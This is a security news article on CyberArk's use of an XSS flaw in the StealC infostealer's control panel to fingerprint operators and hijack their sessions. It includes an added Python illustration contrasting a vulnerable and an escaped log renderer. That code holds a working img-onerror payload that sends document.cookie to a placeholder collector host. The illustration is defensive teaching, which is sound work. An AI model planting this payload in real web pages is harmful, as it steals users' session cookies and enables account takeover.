CyberArk researchers have identified a cross-site scripting (XSS) flaw in the web-based control panel used by operators of StealC, an info-stealing malware, which allowed the researchers to observe active operator sessions and gather technical intelligence on the attackers’ hardware and configurations. StealC emerged in early 2023 and quickly gained popularity on dark web cybercrime forums due to its evasion capabilities and extensive data theft functionality.
Over time, the malware’s developer introduced multiple enhancements. The release of version 2.0 in April 2025 added Telegram bot support for real-time alerts and a new builder capable of generating StealC builds from custom templates and data theft rules. Around the same period, the source code for StealC’s administration panel was leaked, giving researchers a chance to analyze how it operates. By exploiting the XSS vulnerability, CyberArk was able to collect browser and hardware fingerprints of operators, retrieve active session cookies, and hijack panel sessions remotely. Researchers noted that the fingerprints gathered this way exposed details such as operating system, device type, language settings, and general geographic indicators.
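The technique described above depends on a panel that renders data harvested from infected machines into its HTML without escaping, so that a researcher who controls what an "infection" reports can plant markup the operator's browser will execute. The following is an added illustration, not CyberArk's code and not StealC's leaked panel source: a hypothetical log-viewer row renderer in its vulnerable and hardened forms, a parser-based check that shows what a browser would actually execute from each, and the response-header settings that limit what such a payload can reach. The field names, the sample log and the collector URL are constructed for the example; nothing here is a claim about which field in the real panel was vulnerable.

```python
import html
from html.parser import HTMLParser

# Constructed sample "victim log", shaped like what a stealer panel might ingest.
# Every harvested field is attacker-controlled from the panel's point of view:
# whoever runs the stealer on a lab machine can put arbitrary text in the hostname.
# The payload below reads the operator's cookies and user agent and sends them to
# a collector; collector.invalid is a placeholder, not a real endpoint.
PLANTED_LOG = {
    "ip": "203.0.113.7",
    "country": "US",
    "hostname": ('<img src=x onerror="fetch(\'https://collector.invalid/?c=\''
                 '+encodeURIComponent(document.cookie+\'|\'+navigator.userAgent))">'),
    "passwords": 12,
}


def render_row_unsafe(log):
    """Vulnerable: untrusted fields are formatted straight into the HTML."""
    return (f"<tr><td>{log['ip']}</td><td>{log['country']}</td>"
            f"<td>{log['hostname']}</td><td>{log['passwords']}</td></tr>")


def render_row_safe(log):
    """Hardened: every untrusted field is escaped for the HTML text context."""
    cells = (log["ip"], log["country"], log["hostname"], str(log["passwords"]))
    return "<tr>" + "".join(
        f"<td>{html.escape(c, quote=True)}</td>" for c in cells) + "</tr>"


class _TagCollector(HTMLParser):
    """Collects the tags and on* event-handler attributes a browser would parse."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def active_content(rendered):
    """Return (tags, event handlers) actually present in the rendered HTML.

    Substring checks are misleading here: the escaped row still contains the
    text 'onerror=' as data, but no parser will treat it as an attribute.
    """
    collector = _TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags, collector.handlers


def hardened_headers(session_id):
    """Response headers that blunt a payload even if an escape is missed.

    HttpOnly keeps document.cookie from exposing the session, SameSite limits
    cross-site use of it, and the CSP blocks inline handlers and outbound
    fetches to anything but the panel's own origin. These are standard
    mitigations, not a description of the real panel's configuration.
    """
    return {
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Strict; Path=/",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "connect-src 'self'; img-src 'self'",
    }


if __name__ == "__main__":
    for name, renderer in (("unsafe", render_row_unsafe), ("safe", render_row_safe)):
        tags, handlers = active_content(renderer(PLANTED_LOG))
        print(f"{name}: tags={tags} handlers={handlers}")
```

Running the block prints an `img` tag with an `onerror` handler for the unsafe renderer and only `tr`/`td` tags with no handlers for the safe one. The lesson generalizes: a stealer panel, like any admin UI, sits downstream of data its own victims can shape, and the operator's browser session is the asset the XSS reaches.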
The investigation highlighted the activities of a StealC customer referred to as ‘YouTubeTA,’ who hijacked old, legitimate YouTube channels, likely using compromised credentials, to distribute malware. Campaigns run by the operator throughout 2025 collected over 5,000 victim logs, including approximately 390,000 passwords and 30 million cookies, most of which were not sensitive. The majority of infections occurred when victims searched for cracked versions of Adobe Photoshop and After Effects. CyberArk researchers were able to trace the operator’s device to an Apple M3 system with English and Russian language settings and an Eastern European time zone, and, after the operator once failed to connect through a VPN, to an IP address belonging to the Ukrainian ISP TRK Cable TV.
CyberArk emphasized that malware-as-a-service platforms like StealC allow rapid scaling of operations but also increase the risk of exposure for threat actors. Researcher Ari Novick noted that disclosing the existence of the XSS flaw could disrupt operations, particularly in light of a recent spike in the number of StealC operators, possibly following incidents involving the Lumma malware platform. By revealing the vulnerability, CyberArk hopes operators will reconsider the use of StealC and reassess security measures, potentially impacting the broader MaaS market. This research provides insights into how exploitation of administrative panel vulnerabilities can reveal operational patterns and technical details of malicious actors while supporting defensive cybersecurity efforts.